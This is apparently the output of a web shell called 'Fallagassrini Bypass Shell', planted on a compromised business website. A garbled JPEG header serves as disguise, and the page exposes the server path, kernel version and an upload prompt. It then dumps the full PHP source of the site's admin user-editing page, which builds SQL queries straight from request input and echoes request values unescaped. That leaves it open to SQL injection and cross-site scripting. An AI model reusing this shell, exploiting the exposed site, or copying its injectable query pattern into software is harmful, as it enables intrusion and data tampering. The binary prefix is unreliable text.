JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/domains/tarinienterprises.in/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/domains/tarinienterprises.in/public_html/admin/edituser.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");
check_userlogin();

if($_SERVER['REQUEST_METHOD']=="POST" && $_REQUEST["btnsubmit"]=="Save")
{
	    
	 
	 
	$ins_emp = "update tbl_adminuser set
				name			= '".$_REQUEST["name"]."',
				username		= '".$_REQUEST["username"]."',
				status			= '".$_REQUEST["userst"]."',
				user_type		= '".$_REQUEST["usrtype"]."' where id='".$_REQUEST["cid"]."'";
				
			/*echo "<pre>";
			print_r($ins_emp);   	                 
			die;*/
			
		$ins_result = $db->Execute($ins_emp) or die(mysql_error());
		
	if(ins_result)
	{
		url_redirect("manage_user.php?edit=2");
	}
}

$sqlapp = "select * from tbl_adminuser where id='".$_REQUEST["cid"]."' ";
$resapp = $db->Execute($sqlapp);
$totalapp  = $resapp->RecordCount();

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title><?php echo PROJECT_TITLE;?></title>
	<link rel="stylesheet" type="text/css" href="css/text.css" />
    <link rel="stylesheet" type="text/css" href="css/grid.css"  />
    <link rel="stylesheet" type="text/css" href="css/layout.css"/>
    <link rel="stylesheet" type="text/css" href="css/nav.css"  />
    <link rel="stylesheet" type="text/css" href="css/reset.css" />
    <link href="css/demo_page.css" rel="stylesheet" type="text/css" />
<script language="javascript" src="includes/jquery.js" type="text/javascript"></script>
<script language="javascript" src="includes/classified_ajax.js" type="text/javascript"></script>    
<script src="includes/javascript_function.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript">
//==== Validate form filled by user ================== 
function validateinfo()
{
	     
	  
	var name=trim(document.frmcrm.name.value);
	var username=trim(document.frmcrm.username.value);
	//var newpass=trim(document.frmcrm.newpass.value);
	//var confpass=trim(document.frmcrm.confpass.value);
	
	
	if(name=="")
	{
		alert('Name should not be blank .');
		document.frmcrm.name.focus();
		return false;
	}
	else if(username=="")
	{
		alert('Username should not be blank .');
		document.frmcrm.username.focus();
		return false;
	}
	
}
</script>
<!-- CAlendar Code here-->
<link type="text/css" href="calen/base/ui.all.css" rel="stylesheet" />
<script type="text/javascript" src="calen/jquery-1.3.2.js"></script>
<script type="text/javascript" src="calen/ui/ui.datepicker.js"></script>
<link type="text/css" href="calen/demos.css" rel="stylesheet" />
<script language="javascript" type="text/javascript">

$(function() {
			 
		$("#datepicker").datepicker({minDate: -30, maxDate: +30});
	});	

$(function() {
			 
		$("#datepicker1").datepicker({minDate: -30, maxDate: +30});
	});	
</script>
          
</head>

<body style="margin:0px; padding:0px;">
<div class="container_12">
        <div class="grid_12 header-repeat">
        <?php include("includes/service_top.php");?>
        </div>
        <div class="clear">
        </div>
        <?php //include("includes/topmenu.php");?>
        <div class="clear">
        </div>
        <div class="grid_2">
        <?php include("includes/leftmenuadm.php");?>    
        </div>
        <div class="grid_10">
            <div class="box round first">
                <h2>Add New User</h2>
                <div class="block">
                <!-- Table data start-->
<form name="frmcrm" id="frmcrm" action="" method="post" onsubmit="return validateinfo();" enctype="multipart/form-data">
<input type="hidden" name="cid" id="cid" value="<?php echo $_REQUEST["cid"];?>" />
<table width="100%" cellpadding="5" cellspacing="0" border="0" style="border:0px solid #999; border-collapse:collapse; font-size:12px;">
 <tr>
    <td valign="top">
    <fieldset style="border:1px solid #CCC; padding-left:10px;">
    <legend style="background-color:#CCC; color:#333; font-weight:bold; padding:6px;">New User</legend>
    <table border="0" width="95%" style="background-image:none; border:none;">
    <tr>
    <td align="right" width="30%"><label><b><span class="requfield">*</span>Name : </b></label></td>
    <td width="70%"><input type="text"  name="name" id="name"  value="<?php echo $resapp->fields["name"];?>" class="widtxt" /></td>
    </tr>
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>Username : </b></label></td>
    <td><input type="text"  name="username" id="username"  value="<?php echo $resapp->fields["username"];?>" class="widtxt" /></td>
    </tr>
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>User Type : </b></label></td>
    <td>
    <input type="radio" name="usrtype" id="usrtype" <?php if($resapp->fields["user_type"]=="1") { echo 'checked="checked"';}?> value="1"  />Admin&nbsp;&nbsp;
    <input type="radio" name="usrtype" id="usrtype" <?php if($resapp->fields["user_type"]=="2") { echo 'checked="checked"';}?> value="2"   />Support
    </td>
    </tr> 
    <tr>
    <td align="right"><label><b><span class="requfield">*</span>User Status : </b></label></td>
    <td>
    <input type="radio" name="userst" id="userst" <?php if($resapp->fields["status"]=="0") { echo 'checked="checked"';}?> value="0"  />Active&nbsp;&nbsp;
    <input type="radio" name="userst" id="userst" <?php if($resapp->fields["status"]=="1") { echo 'checked="checked"';}?> value="1"   />Inactive
    </td>
    </tr>   
    </table>
    </fieldset>
    </td>
  </tr>
  <tr>
    <td  align="center">
    <!--<a href="add_device.php">-->
    <input class="submit-green" name="btnsubmit" id="btnsubmit" type="submit" value="Save" />
    <!--</a>-->
    </td>
  </tr>
</table>
</form>	               
                <!-- Table data end-->
                </div>
            </div>
            
        </div>
        
        
        <div class="clear">
        </div>
    </div>
    <div class="clear">
    </div>
    <?php include("includes/footer.php");?>
</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net